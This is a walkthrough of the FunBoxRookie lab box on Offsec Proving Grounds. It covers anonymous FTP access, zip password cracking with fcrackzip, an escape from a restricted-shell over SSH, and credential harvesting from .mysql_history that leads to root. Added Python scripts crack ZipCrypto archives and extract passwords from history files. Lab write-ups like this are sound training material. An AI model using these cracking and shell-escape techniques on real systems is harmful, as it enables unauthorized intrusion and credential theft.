# Offsec Proving Grounds - FunBoxRookie Walkthrough
#### Machine Details
#### Name: FunBoxRookie
#### IP address: 192.168.66.107
#### Difficulty: Easy
#### Points: 5
---
## It all began with nmap
Once the box is up, the first step as usual is a port scan. nmap comes to the rescue, and the result is shown below.

From the scan results, three services are running on this box: an FTP service on port 21, an SSH service on port 22 and an HTTP service on port 80. Interestingly, the FTP service allows [anonymous login](https://whatis.techtarget.com/definition/anonymous-FTP-File-Transfer-Protocol).
Before checking out the FTP service, I quickly entered the IP address of the box into a browser to see what the web server was serving, and I was greeted with the following page:

I ran directory enumeration with gobuster in the background, but it did not turn up much. Visiting /robots.txt, on the other hand, gave me this:

Awesome! We found /logs/. I quickly tried to access it, but to my surprise I got the page below:

## I am ANONYMOUS
At this point, I went back to the FTP server and logged in as anonymous. Listing the files on the server (dotfiles included) shows several zip files and a few hidden files, which I downloaded to my local machine.

I opened welcome.msg, displayed below, but it did not contain much of interest.

Opening the .@admin file shows what looks like an encoded message.

The .@users file, on the other hand, points to the next line of action.

I tried to unzip each of the zip files, but they all require a password.

## Crack 'em all
Since the note from root hinted that the passwords are the old ones, I tried to crack each zip file with fcrackzip and the rockyou.txt wordlist. Of the eleven zip files, I was able to crack two, cathrine.zip and tom.zip, and extract their id_rsa files.
```
# -D: dictionary mode, -p: wordlist to use, -v: verbose,
# -u: verify every candidate by actually unzipping (weeds out false positives)
fcrackzip -u -D -v -p /usr/share/wordlists/rockyou.txt file.zip
```
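The reason `-u` matters is that fcrackzip's fast check only looks at the 12-byte ZipCrypto header, which roughly 1 in 256 wrong passwords will pass; `-u` re-verifies each hit by really unzipping. The following is an added example, not code from the original walkthrough: a minimal Python dictionary attack that uses the same verification idea, accepting a candidate only if the entry fully decrypts with a matching CRC-32. To run offline it builds a small ZipCrypto-protected archive in memory with a hand-rolled encryptor; the entry name, contents, wordlist and password are all constructed and have nothing to do with the box's files or the rockyou hit.

```python
"""Dictionary attack on a ZipCrypto-protected archive, verified the way
fcrackzip -u does it: a hit must survive a full decrypt with a matching
CRC-32, not just the 12-byte header check byte.

Added example for this walkthrough; not the original author's code. The
archive is built in memory with a hand-rolled ZipCrypto encryptor so the
script runs offline. Entry name, contents, wordlist and password are all
constructed; they are not the box's files or the rockyou hit.
"""
import io
import struct
import zipfile
import zlib

# Standard CRC-32 table (poly 0xEDB88320); ZipCrypto's key schedule uses
# the raw table step, not the zlib.crc32 wrapper with its pre/post inversion.
_CRCTAB = []
for _n in range(256):
    _c = _n
    for _ in range(8):
        _c = (_c >> 1) ^ 0xEDB88320 if _c & 1 else _c >> 1
    _CRCTAB.append(_c)


def _crc_step(crc, b):
    return (crc >> 8) ^ _CRCTAB[(crc ^ b) & 0xFF]


def zipcrypto_encrypt(plaintext, password, check_byte):
    """Traditional PKWARE encryption: a 12-byte header whose last byte is
    check_byte, then the payload, both under the password-derived keystream."""
    k0, k1, k2 = 0x12345678, 0x23456789, 0x34567890

    def update(c):
        nonlocal k0, k1, k2
        k0 = _crc_step(k0, c)
        k1 = ((k1 + (k0 & 0xFF)) * 134775813 + 1) & 0xFFFFFFFF
        k2 = _crc_step(k2, k1 >> 24)

    for p in password:
        update(p)
    out = bytearray()
    # Real archivers fill the first 11 header bytes with random data.
    for c in bytes(11) + bytes([check_byte]) + plaintext:
        t = k2 | 2
        out.append(c ^ (((t * (t ^ 1)) >> 8) & 0xFF))
        update(c)
    return bytes(out)


def build_encrypted_zip(name, data, password):
    """Single stored (uncompressed) entry with general-purpose flag bit 0
    (encrypted) set; the check byte is the high byte of the CRC-32."""
    crc = zlib.crc32(data) & 0xFFFFFFFF
    body = zipcrypto_encrypt(data, password, (crc >> 24) & 0xFF)
    fname = name.encode()
    mtime, mdate = 0, 0x21  # DOS time/date for 1980-01-01 00:00:00
    local = struct.pack("<IHHHHHIIIHH", 0x04034B50, 20, 1, 0, mtime, mdate,
                        crc, len(body), len(data), len(fname), 0) + fname + body
    central = struct.pack("<IHHHHHHIIIHHHHHII", 0x02014B50, 20, 20, 1, 0,
                          mtime, mdate, crc, len(body), len(data),
                          len(fname), 0, 0, 0, 0, 0, 0) + fname
    eocd = struct.pack("<IHHHHIIH", 0x06054B50, 0, 0, 1, 1,
                       len(central), len(local), 0)
    return local + central + eocd


def read_entry(zip_bytes, password):
    """Decrypt and return the first entry; raises on a wrong password."""
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        return zf.read(zf.namelist()[0], pwd=password)


def crack_zip(zip_bytes, wordlist):
    """Return the first candidate that fully decrypts the first entry.
    zipfile raises RuntimeError when the header check byte is wrong and
    BadZipFile when a false positive (about 1 in 256 wrong passwords)
    passes the header but the CRC-32 of the decrypted data does not match."""
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        name = zf.namelist()[0]
        for cand in wordlist:
            try:
                zf.read(name, pwd=cand.encode())
                return cand
            except (RuntimeError, zipfile.BadZipFile):
                continue
    return None


# Constructed demo data (not from the box).
SECRET = b"-----BEGIN OPENSSH PRIVATE KEY-----\nconstructed placeholder\n"
PASSWORD = b"sunshine42"
WORDLIST = ["123456", "password", "letmein", "qwerty", "sunshine42", "dragon"]
ARCHIVE = build_encrypted_zip("id_rsa", SECRET, PASSWORD)

if __name__ == "__main__":
    print("cracked:", crack_zip(ARCHIVE, WORDLIST))
```

Catching both exceptions is the whole point: a candidate that passes the header byte but trips the CRC is exactly the false positive that `fcrackzip` without `-u` would report as a hit.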


## Let me in
After I obtained the id_rsa files, I tightened their permissions first, since ssh refuses to use a private key that other users can read. I then tried to SSH in with cathrine's id_rsa, but I kept getting a connection closed message.
```
chmod 0600 id_rsa
```

Trying tom's id_rsa instead logged me into the box, and from there I could read the local.txt file.


## Oh my! It's jailbreak time
One thing I noticed is that tom's login shell is a restricted shell (rbash), so I had to break out of it. rbash will still execute a command handed to it, so asking ssh for a terminal plus a specific command starts an unrestricted bash; `--noprofile` keeps it from sourcing the login scripts that typically re-apply the restrictions (for example a read-only PATH):

```
ssh -i id_rsa tom@192.168.66.107 -t "bash --noprofile"
```

Now I can use commands such as cd. One of the first enumeration checks I do is to find out what commands I can run as other users by running:
```
sudo -l
```
but I was prompted for a password, which I didn't have yet.
## History
Listing tom's home directory again (dotfiles included), I noticed a .mysql_history file. Opening it, I found credentials for tom; the history file stores each space as the octal escape `\040`, which is why the line reads a little oddly.

```
tom:xx11yy22!
```
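As an added example (not the author's code), here is a small Python parser for a libedit-style `.mysql_history` that undoes the octal escapes (`\040` for space, `\134` for backslash, and so on) and then pulls user/password pairs out of the statements that carry them: `CREATE USER`/`ALTER USER ... IDENTIFIED BY`, the old `GRANT ... IDENTIFIED BY` form, and `SET PASSWORD FOR ... = PASSWORD(...)`. The sample history content is constructed for the example and is not the file from the box.

```python
"""Decode a libedit-style .mysql_history and pull out credentials.

Added example for this walkthrough, not the original author's code.
SAMPLE_HISTORY below is constructed for the example; it is not the real file.
"""
import re

# Constructed sample: libedit history header plus a few statements.
# Spaces are written as \040 and a literal backslash as \134.
SAMPLE_HISTORY = r"""_HiStOrY_V2_
show\040databases;
use\040mysql;
CREATE\040USER\040'tom'@'localhost'\040IDENTIFIED\040BY\040'xx11yy22!';
GRANT\040ALL\040ON\040*.*\040TO\040'backup'@'%'\040IDENTIFIED\040BY\040'Ba\134ckup#1';
SET\040PASSWORD\040FOR\040'tom'@'localhost'\040=\040PASSWORD('newpass');
select\040*\040from\040user;
"""

# One backslash followed by three octal digits.
_OCTAL = re.compile(r"\\([0-7]{3})")


def decode_line(line):
    """Replace each \\NNN octal escape with the character it stands for."""
    return _OCTAL.sub(lambda m: chr(int(m.group(1), 8)), line)


def decode_history(text):
    """Return the decoded statements, dropping the libedit version header."""
    statements = []
    for raw in text.splitlines():
        if not raw or raw.startswith("_HiStOrY_V"):
            continue
        statements.append(decode_line(raw))
    return statements


# Statements that embed a password next to an account name.
_CRED_PATTERNS = [
    re.compile(r"(?:CREATE|ALTER)\s+USER\s+'([^']+)'@'[^']*'\s+IDENTIFIED\s+BY\s+'([^']+)'", re.I),
    re.compile(r"GRANT\b.*?\bTO\s+'([^']+)'@'[^']*'\s+IDENTIFIED\s+BY\s+'([^']+)'", re.I),
    re.compile(r"SET\s+PASSWORD\s+FOR\s+'([^']+)'@'[^']*'\s*=\s*PASSWORD\('([^']+)'\)", re.I),
]


def extract_credentials(text):
    """Return (user, password) pairs in the order they appear in the history."""
    found = []
    for stmt in decode_history(text):
        for pattern in _CRED_PATTERNS:
            for user, password in pattern.findall(stmt):
                found.append((user, password))
    return found


if __name__ == "__main__":
    for user, password in extract_credentials(SAMPLE_HISTORY):
        print(f"{user}:{password}")
```

The same decoding applies to any other file libedit writes in this format; the credential patterns are deliberately narrow, so anything they miss still shows up in the decoded statements for a manual read.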
Since no MySQL service is running on the box, the most promising use for the password was tom's own account (classic password reuse), so I tried it at the sudo -l prompt from earlier.

## ROOOOOOOOT!
Luckily, tom can run all commands as all users, including root, on the box. To obtain a root shell, I only needed to run:
```
sudo -i
```
And BOOM! we're root!

###### tags: `offsec proving grounds` `funboxrookie` `anonymous ftp` `password reuse` `fcrackzip` `zip cracking` `bypassing restricted shells` `history`